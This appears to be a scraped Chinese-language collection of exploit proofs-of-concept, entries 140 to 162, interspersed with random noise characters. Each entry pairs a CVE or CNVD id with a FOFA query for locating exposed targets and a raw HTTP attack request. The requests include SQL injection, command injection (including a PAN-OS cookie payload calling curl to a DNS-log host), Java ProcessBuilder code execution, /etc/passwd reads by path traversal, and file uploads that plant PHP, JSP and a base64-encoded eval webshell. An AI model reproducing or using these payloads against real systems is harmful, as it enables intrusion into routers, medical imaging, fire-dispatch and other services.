User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" {4 m8 S- k9 f. T$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& `# E3 {- ~1 ]; i6 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: {, L7 u5 h6 P
Accept-Encoding: gzip, deflate, br. ~" @$ \* x' C2 D% Q$ u
Connection: close5 A0 e% v4 b# ~! J' ?
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
9 T6 N% {/ S3 {. X% v2 fUpgrade-Insecure-Requests: 15 e ~0 C8 M0 r9 ~
" T5 W& m3 p y4 I
% V& p2 B5 z5 z2 t7 h140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 J+ U& [2 ^- R) ]CVE-2024-25664 Q9 ]; L) G j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% u4 v) X( {: qGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1' r. G' R. Y" H" K+ }6 w1 X
Host: x.x.x.x' x' v9 \' t L+ d# c% z+ q _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; z$ [6 x, [2 u' i' _3 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! Q, V5 q- f" w" t$ G9 J4 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 I7 n! |. y! z4 j
Accept-Encoding: gzip, deflate, br* K5 ]/ n4 @- S2 w. s1 Z) s
Connection: close
7 J" u# O5 |' x0 w8 R0 ` FCookie: authcode=h8g9
% ?: z% h! @9 R pUpgrade-Insecure-Requests: 1" {+ c/ X, C4 x& b
; i# T0 G0 i( b4 u& \9 r; u
& t0 u( ^1 j0 v. s* S/ H" _0 h, ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入* V; h& T* \ P3 g; O9 H
FOFA:body="指挥调度管理平台"
* u5 k. z) V0 [" C6 h- JPOST /app/ext/ajax_users.php HTTP/1.1# z5 K4 F; j( k) x0 L
Host: your-ip
* F7 }/ x# Q" I$ M! P* sUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; w' ]+ `# Q2 A$ U! z
Content-Type: application/x-www-form-urlencoded
) k, u" o ]2 J9 x7 @9 b
) O# B, C- ?7 ~" M3 r( `+ w2 E- x) b
+ i% s: S- d; |2 Y& z" M7 {dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 n+ M6 `! C% W# O& F; t/ c- p) c( K+ u1 b- T- C
# N( [, p, n# |* [3 x0 H7 B
142. CMSV6车辆监控平台系统中存在弱密码. V8 E" [7 H" k/ Z
CVE-2024-29666* ^7 p$ ?7 y& v2 [
FOFA:body="/808gps/"0 I6 S$ l1 W4 S
admin/admin: H: e: b: b+ z8 u1 q3 ^1 ^
143. Netis WF2780 v2.1.40144 远程命令执行
/ d* t1 w) V/ l; oCVE-2024-25850
2 m$ j+ K* j: A4 a; B5 x) W5 J! H/ ~FOFA:title='AP setup' && header='netis'
W' F' W# Q: S% A! tPAYLOAD) Z& }) M1 n8 U4 l# K+ W2 F
# C% ]& n' l, |, J1 V" n; a( E144. D-Link nas_sharing.cgi 命令注入8 u" y: P; V: @: l
FOFA:app="D_Link-DNS-ShareCenter"8 K+ o/ N1 X' I/ t$ ~ ~& }2 [* l/ `
system参数用于传要执行的命令
* P) p8 F1 ]; G0 Q) h' o4 zGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1+ K1 t# a, i3 u3 P$ ^4 o k
Host: x.x.x.x
( L3 u* i; d8 ?( G EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
" U. m- A" a! u' K4 b6 A) vConnection: close: R _4 ?" v, C3 W2 w# ?" n+ G
Accept: */*5 b8 N: d" g. Q b: y- q% x( c: B
Accept-Language: en
6 D! ^' J" y! N/ N+ P. b) `% Q% kAccept-Encoding: gzip1 i4 ?' {* u6 h! |! p. X" T. z
# g) ~) U2 Q! o4 O2 @+ G9 Q/ ~% e6 V- {/ @& g! m) ]
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# s* u+ F6 U8 \
CVE-2024-3400; L+ S" r. b: l8 D; H: u5 b3 u
FOFA:icon_hash="-631559155"& Q/ _4 h1 g! y1 v& k, N* I
GET /global-protect/login.esp HTTP/1.1
! G+ B( k O+ H( x, RHost: 192.168.30.112:1005
+ s& b- c/ Y5 m* FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
* V, _" [, \( n. t4 @% tConnection: close Z; y8 l/ C9 }4 `' O
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
# h. L+ A) k: c P( ]Accept-Encoding: gzip) Y: n3 S/ K: {: ~
) A( h% L+ k% B' H
o! ^ a6 K& x( |7 L- g146. MajorDoMo thumb.php 未授权远程代码执行# j# y! s P7 k3 e
CNVD-2024-02175
) X8 C% c s7 k. F. hFOFA:app="MajordomoSL"
$ U& C7 U& a" A" f( U* j- H( @& s4 _GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" A# i' s& E0 UHost: x.x.x.x
! \6 i4 j9 [0 S0 n+ r2 ~1 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.847 ^/ i4 f v" h8 J! V
Accept-Charset: utf-8
6 e( E h1 L; K4 ?) X& F2 eAccept-Encoding: gzip, deflate+ E2 T; d) d. \' c
Connection: close
: s7 [$ p' Y! W! E, m# n" m! w2 s5 p2 U) G) f: W; P6 P
# M& V+ P. |* o* C147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: B8 s; V$ D2 I. SCVE-2024-323998 h7 u; W( D" e) G) l) i) s
FOFA:body="RaidenMAILD"8 j' a9 d# j! y+ k3 W
GET /webeditor/../../../windows/win.ini HTTP/1.1
! p1 [+ d M% U* OHost: 127.0.0.1:81
, H* b) v J+ A$ u: g3 ^( |Cache-Control: max-age=0, g* A6 z0 C# X+ I$ |
Connection: close
' M+ Q2 i5 ?- N/ r- X8 E' O8 m; R, u$ X( y, G
' E$ P5 z" _: D) F
148. CrushFTP 认证绕过模板注入
4 |4 |* b) r9 X+ @& J2 S% hCVE-2024-4040 B: B8 S4 Z* X+ G: u) `
FOFA:body="CrushFTP"
( o* q: g9 Z! t9 APAYLOAD; m! n3 x( `% d" ?6 T1 p0 m
' y# j6 a# `1 D% U) }149. AJ-Report开源数据大屏存在远程命令执行
& l h. g7 R" A5 GFOFA:title="AJ-Report"( q6 ?) s2 V" k
' C I* `3 l- [9 b3 `. OPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 c6 I' u7 v# ?- `7 A7 DHost: x.x.x.x
- J) ^( T* v: Y, o7 Y, @. W9 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 B* Q& z; C; S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 y5 n& f" k. |1 tAccept-Encoding: gzip, deflate, br
5 z( g1 V1 L# W. LAccept-Language: zh-CN,zh;q=0.9
" D, U- f, J: eContent-Type: application/json;charset=UTF-8
# i1 X0 a3 E9 l8 @Connection: close
7 w. i" E) s* o5 z; q: L5 Y* ?5 M( r4 ]) t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 g6 ~% }) U. S- u$ K; D+ E$ D+ K7 D7 f
150. AJ-Report 1.4.0 认证绕过与远程代码执行
5 X1 R# e2 a* QFOFA:title="AJ-Report"+ o. \ Q" T# r0 \% B% ~
POST /dataSetParam/verification;swagger-ui/ HTTP/1.11 c. W) d5 ^* m8 {+ k5 |% |8 z! z
Host: x.x.x.x
$ D* j1 U" a/ F0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. @& [ ]0 k- l( H U+ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ a, \9 W. M, y$ C8 I/ ~Accept-Encoding: gzip, deflate, br
$ O3 l8 {1 t. H( W0 v, M# E7 s+ J+ M$ AAccept-Language: zh-CN,zh;q=0.9' _9 i( W+ V- o% z- D& X9 ^
Content-Type: application/json;charset=UTF-8
8 u. ~7 i# L7 P1 WConnection: close1 v4 U( q, x+ A; W8 Y( O7 h. X
Content-Length: 339
* t- @3 D! L' r7 V) U7 I c
1 n" R) v7 B. u- Z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; b3 w- Z2 _3 K9 @* P8 j) N- c/ z6 i
# W$ Y3 |" D( z u! N; @
; y# n7 _& [, h/ r* V' @151. AJ-Report 1.4.1 pageList sql注入
3 K' |0 }0 D0 N1 zFOFA:title="AJ-Report"1 O4 A! F, |8 b9 L
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1+ r2 H# |! H( _# k8 Q
Host: x.x.x.x7 w) U8 L! A; c( D; f$ S- k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 T; k% M' F6 V9 N3 @9 h: h( k
Connection: close" h5 t1 a5 K; @8 D2 Z* U
Accept-Encoding: gzip
2 N' `8 p7 y' ]$ L: s
) j$ k4 `/ A2 O. g! T
6 b1 d- w3 v7 ?7 V, R152. Progress Kemp LoadMaster 远程命令执行
2 `. k, d1 w L/ XCVE-2024-1212; N, W( N0 Q# x. B
LoadMaster <= 7.2.59.2 (GA)
9 V# p9 D# L( { e3 Y s' rLoadMaster<=7.2.54.8 (LTSF)
3 }* {% v# h- u, F. g+ d* X% vLoadMaster <= 7.2.48.10 (LTS)
! r: l+ q% N+ P/ A3 [- o8 T$ GFOFA:body="LoadMaster"% |1 N' X* b" V }* l$ ?* y& u9 i
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 V9 v/ W' x' OGET /access/set?param=enableapi&value=1 HTTP/1.1$ g( R5 K* t& o* p% p- Q/ t- Z
Host: x.x.x.x) N+ _ _4 @# ]" O9 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1: @' X" s/ {. R7 C! D, Z- {7 l
Connection: close/ y/ s% ^2 d; ?* O! u
Accept: */*
8 m: @$ _- U" S* u0 x) ]Accept-Language: en! U/ G0 `( g; F: H. p, b8 d, s
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=5 y" a$ Y7 k1 S$ Z
Accept-Encoding: gzip
* _; e- B9 }! V& O
+ d `3 e% V: T8 J7 l# k6 `( S+ P, F. P1 {9 Z4 [
153. gradio任意文件读取
: |% A7 N" p/ t- f+ r. u3 fCVE-2024-1561FOFA:body="__gradio_mode__"- P; T0 K0 L/ E
第一步,请求/config文件获取componets的id
2 b6 v2 }+ K$ {2 `http://x.x.x.x/config, Z4 v/ K% n- U
& k& i6 ]+ V. A: }# [
0 n' A, }. s$ o( u# e) ^
第二步,将/etc/passwd的内容写入到一个临时文件
5 C: i1 s: c9 QPOST /component_server HTTP/1.1
2 R7 |- p# L: \Host: x.x.x.x" i0 e0 p: ` v' w$ \! B# r" b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
. \% |6 d. y$ @Connection: close
* D5 t4 _$ ]4 v, F1 j0 ]( E; d# F5 [Content-Length: 1158 C$ K2 h+ f9 H$ N0 t
Content-Type: application/json
' K% |: a. r9 P0 p, \( KAccept-Encoding: gzip. H, V: P. h. g# C
* Y. a" G4 A) S
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, P* \. d# j) W; Z
4 \' e' l' W: c0 C( S$ }
, z0 P/ O6 ` g; _* G/ d3 n* M3 R' G( G第三步访问0 r k* d. M, R' X& Z
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
) J, m, n& N* v+ h3 u3 @, W0 ^+ }4 I2 J D. C
- d# j2 U& r$ e0 w+ o) }1 f7 O154. 天维尔消防救援作战调度平台 SQL注入/ |; A6 f, k0 V1 T, a
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"- ?5 p; h& x) b, A3 X
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
& w9 }& E1 r6 K9 F- ?! pHost: x.x.x.x
( \- m' t) a: E- @% U0 K6 TContent-Length: 106! b9 L/ |+ t" W& Q: Z6 u- ^
Cache-Control: max-age=0
* J9 ]/ X' a1 M# L4 kUpgrade-Insecure-Requests: 1: v# v: \! D" F
Origin: http://x.x.x.x
! U3 a, y4 u Y! y6 h5 s4 {Content-Type: application/json" P* Z! }9 {+ ^6 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 j0 j# k& k6 g$ A" Y, W. z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! w6 W: g* k4 B. z# L, g
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: F- Z$ r2 [0 J! Z
Accept-Encoding: gzip, deflate( _3 n* V8 l, b
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
( ^2 G7 a! ?4 O4 PConnection: close) B: Z# ?% c9 U# S ]( [
8 R3 ^/ |6 w8 v+ h3 m{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
3 k. l: v/ x% G6 f' M" O7 P% v- X4 R: n# ?- B- G8 m
6 a6 ^, P7 j+ L9 T: E, i3 K9 e
155. 六零导航页 file.php 任意文件上传7 d+ n# R- a8 q8 ~
CVE-2024-34982: t: I% ^9 L1 Q$ v
FOFA:title=="上网导航 - LyLme Spage"
) Y2 t2 b5 d' fPOST /include/file.php HTTP/1.1
1 H9 @7 o- l" u( G2 B/ E+ pHost: x.x.x.x
+ Q0 e) z \0 p5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 ?- N# q0 T/ i6 f. s1 ?
Connection: close
2 u" u; p5 z! |% kContent-Length: 232
3 z/ E- d7 }& [8 {9 c" O2 OAccept: application/json, text/javascript, */*; q=0.01: f, K5 _8 s' W4 E7 Q7 Z
Accept-Encoding: gzip, deflate, br
, O; m b0 \$ i: p: sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ Z" B7 B( {' K6 `
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
+ @; H( K) s- C. Q1 R! }2 }X-Requested-With: XMLHttpRequest7 ~! M1 X+ J) i" G
) x5 a7 `3 T$ p-----------------------------qttl7vemrsold314zg0f* V5 f2 U1 u- g- m6 K0 g
Content-Disposition: form-data; name="file"; filename="test.php"2 m. h, W% x! y: O- v2 H
Content-Type: image/png
) {2 h$ e" R2 N. l# n$ j) R: f
4 r% V4 d: R( S# Z<?php phpinfo();unlink(__FILE__);?>2 `+ U9 s2 ]3 a$ Y
-----------------------------qttl7vemrsold314zg0f--0 T8 B' w! ^& {$ k! l5 p
; k4 }: G+ P) F( m0 D
0 [7 T, T- [/ t, A8 t0 d! X4 U8 L2 X访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
$ e6 K' g) L% f* i$ r
" m5 o4 Y" }" v; W: v156. TBK DVR-4104/DVR-4216 操作系统命令注入' `5 } f# |' q) z) O
CVE-2024-3721- T1 ]6 h) v) H% p5 ]+ O
FOFA:"Location: /login.rsp". q6 M% T8 @2 Z1 G- e6 t) u# u
·TBK DVR-41042 v+ _# z! r( a2 F- l* Q2 a
·TBK DVR-4216
' n4 F6 J. ], D2 s- I( P! hcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"8 O4 N$ d" a4 V
- ?( R8 B) ` T0 V
, V% u. c/ v6 G5 W3 g/ P3 j7 k) h
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1# k" q4 W8 x6 m+ d2 x. ]; V
Host: x.x.x.x+ Z' f: @) v$ T4 N* E
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! x. G7 |+ Z6 R- r& |5 q# O! WConnection: close/ r- ?. f. a/ Q7 _. o, y& o
Content-Length: 0' i, T* g4 i9 L
Cookie: uid=1
) d4 N0 Q- H# ]Accept-Encoding: gzip
. O$ t! y; p) e! Y/ o0 l) l& W3 J+ _9 V# N) L& |+ L
! {8 j- m/ Y7 Y' l/ z9 C157. 美特CRM upload.jsp 任意文件上传3 o+ c4 i7 g3 h( s# Q5 v5 \
CNVD-2023-06971
: W* v1 ~ ~. c, W" ]FOFA:body="/common/scripts/basic.js"# [$ g( s8 ?5 u
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.18 i# ]# U2 ^3 K3 ^' P& d a9 @; f
Host: x.x.x.x
^$ O' f) i2 ]/ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, q, ]% z* s2 j/ `* C
Content-Length: 709
+ _1 q: z. P' C% Z& yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( A6 w9 J; S) |+ h; t
Accept-Encoding: gzip, deflate9 h6 f9 z! V( Z& c
Accept-Language: zh-CN,zh;q=0.94 S' b' G8 j; [8 x8 _
Cache-Control: max-age=0& e2 e6 k6 l7 U, q$ g
Connection: close! K3 t" D. V: n; x* l Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN8 Y a$ t3 o% ^/ | Y
Upgrade-Insecure-Requests: 1
3 f( v; F. o4 \6 e9 d/ f1 N9 B B. u1 m7 p7 s* u1 w J/ ]+ v% W
------WebKitFormBoundary1imovELzPsfzp5dN
6 \1 c6 H1 m+ S) B2 g: o9 c9 zContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
/ U9 W4 {$ S7 XContent-Type: application/octet-stream
- H5 m- z' m1 ]+ x, s% m' v8 P" l1 j5 c& W* Z1 b2 y
nyhelxrutzwhrsvsrafb
4 r" n$ V1 d M" Q7 V* N1 k* h------WebKitFormBoundary1imovELzPsfzp5dN
- ^- J V# i' M/ jContent-Disposition: form-data; name="key"
" n7 l; w# J) J7 s. l2 k7 y w8 Y. b' }5 Z. z) i
null8 U# ~9 n2 A6 \6 s- X, f
------WebKitFormBoundary1imovELzPsfzp5dN' f) a3 R* R7 a# X, j: a
Content-Disposition: form-data; name="form"
3 {, ^6 B y. Z& |0 ~, \
( ~. n) O+ [3 K$ x, Z+ `) I8 ynull
0 S- I4 X' l) o8 r------WebKitFormBoundary1imovELzPsfzp5dN4 ?1 b. J* s: W1 Q$ w& G6 v0 h
Content-Disposition: form-data; name="field"
$ _, e/ Z- ~/ _6 |4 z
7 `3 H# f8 q. f, X* I. bnull- i U. ]/ T/ G4 U$ p( v0 b( w
------WebKitFormBoundary1imovELzPsfzp5dN# f) Q: Y4 t" f4 W9 k0 l9 o: B/ c
Content-Disposition: form-data; name="filetitile"4 D- A2 ?, V! L0 ^% D+ T1 q- U
6 |$ o6 b$ s3 C, F" T/ Y# M" k: snull7 V. B2 f1 Q% U
------WebKitFormBoundary1imovELzPsfzp5dN
* D8 E* G2 a/ d, G: }Content-Disposition: form-data; name="filefolder"( Z0 R1 V/ h/ t6 u; h. H
: G- I6 {8 x6 R
null0 x" z/ |+ D* O9 g
------WebKitFormBoundary1imovELzPsfzp5dN--
* C6 a4 J% S6 I3 p
5 Y3 C3 a1 Z. r8 X0 r* Z! Q+ k: j4 Z! r# v. R
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
6 y! h6 o0 @! H- J$ C
( k) L5 h; a' }158. Mura-CMS-processAsyncObject存在SQL注入
$ V) S$ i5 @# ?% jCVE-2024-32640# D3 [; y7 D$ q7 i' l
FOFA:"Generator: Masa CMS"9 x8 [! ?% h1 j) v: z! ~
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1/ C$ x* D2 Z9 A# l' p W
Host: {{Hostname}}! h6 s7 Y7 c: J3 Y
Content-Type: application/x-www-form-urlencoded
+ t/ x6 I* m( x l4 B) L& v( _! I2 _7 `6 R2 N' |8 z
object=displayregion&contenthistid=x\'&previewid=1
" G" ]0 c- X1 e u+ K) X6 f, |* z- ~$ f: P3 M: l8 F
0 J' c/ f$ u- S( |9 B1 i W) O
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传1 g; C7 T C. R1 j9 j1 K. O
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
/ J6 C7 |6 y: zPOST /webservices/WebJobUpload.asmx HTTP/1.1
) g8 m6 f0 k5 ^' IHost: x.x.x.x
. D7 R+ `2 d. q- c k/ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" T) v* E- V, w# M' {6 d! F0 x
Content-Length: 1080
" e8 ^4 B2 s" ]" l4 hAccept-Encoding: gzip, deflate0 A1 m: x; V) h" D+ d
Connection: close1 U- {5 }0 M4 y
Content-Type: text/xml; charset=utf-8: ?& e) R; s# H- w
Soapaction: "http://rainier/jobUpload"5 G1 }: ?! M( Y$ |# I, L2 L- e
9 q, ^1 W( h! I7 z! F6 D5 s+ z<?xml version="1.0" encoding="utf-8"?>- Q5 S+ p3 z3 S0 a. M/ _+ @2 f
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
{6 S Q7 M: j! z& O<soap:Body>
; T9 X* d" n$ x' w5 _" s6 p+ x<jobUpload xmlns="http://rainier">: V8 m q: y4 `2 N# k! f
<vcode>1</vcode>
: K3 m5 `" D0 g<subFolder></subFolder>
$ e2 y( H# U4 m! X# p( z$ R1 F<fileName>abcrce.asmx</fileName>$ e* r! [9 w: O8 S4 ~- ^
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>8 O* R% ~" @; t
</jobUpload>
& K6 j" L: J- D1 ~/ v8 m</soap:Body>
9 j$ w" W& u6 z* s2 z- }</soap:Envelope>0 _$ E" H6 _* W+ |9 D2 S1 _0 F
! |$ d8 W$ q) w6 ]4 ?2 H7 Q9 e i, C0 }+ Y ]) B
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")' E" K! i3 p$ F- f
+ a" `7 `0 c: C8 X" L: I6 f& Y
- v8 }$ P6 q- a6 V2 g0 g: S% [160. Sonatype Nexus Repository 3目录遍历与文件读取
5 k% p7 t" M* v: N6 GCVE-2024-4956' g+ c* f$ y# {+ p( J
FOFA:title="Nexus Repository Manager"' e# Z. U W' Y
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
* G1 l* t; m1 OHost: x.x.x.x: C* F5 G$ c* |% a, `- i
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
, d& u; X: X: j2 CConnection: close
/ I1 G2 |) N& g1 CAccept: */* G) E) C) X; D& _) l( ~
Accept-Language: en
3 C/ h7 a& }+ NAccept-Encoding: gzip7 e7 ~2 j/ T; v
5 o3 y& j/ t3 F5 p E
$ B) P( Y! I i* P, o' w161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传7 g0 y* M0 U$ }: Q9 w& K% `
FOFA:body="/KT_Css/qd_defaul.css"# s4 Y9 R* k9 a) @. a! n
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密; u$ K) X7 | Q: E
POST /Webservice.asmx HTTP/1.1
! i5 T2 n$ p* R7 r2 {- T! B( iHost: x.x.x.x' R5 T: s4 t% t/ a# J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36$ |. d8 n \4 O! m
Connection: close
. ~* a& n3 n, f+ @# cContent-Length: 445. o q- A4 W, X" w; Y7 b- F5 v
Content-Type: text/xml/ w/ Y" P; U2 J
Accept-Encoding: gzip$ k: V% W1 {. [6 j% ]% c
/ Q; v+ S z5 ?# ^4 B2 J
<?xml version="1.0" encoding="utf-8"?>
! t' {( L0 u. {<soap:Envelope xmlns:xsi="
3 W' Y! ?4 b% H5 V2 k9 {http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
C( o; b6 h K7 x" a4 v3 d& \# p! |; W% |xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">, s+ E/ R! I( L# [& ]% m
<soap:Body>5 L' g: O5 Q: T( Q& u4 }
<UploadResume xmlns="http://tempuri.org/">% S) B. V+ y' M
<ip>1</ip>( \4 w7 r; ~& _2 X
<fileName>../../../../dizxdell.aspx</fileName>
) G" S& ^! F4 U w<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>) D$ h% I4 x+ ^
<tag>3</tag># V) P1 D1 A8 J( W% Z# @
</UploadResume>% \, k% i% A5 ]! P8 ^* G! A1 V
</soap:Body>
3 ~: v9 n" l) k, }/ L, C: z</soap:Envelope>
' w9 p6 U* d Y4 P, G. O3 G$ q/ S" [% I6 c
2 J! [- l, [0 j' G" X, _ g
http://x.x.x.x/dizxdell.aspx3 W7 y9 G B* I
8 a( J8 j. c& B162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
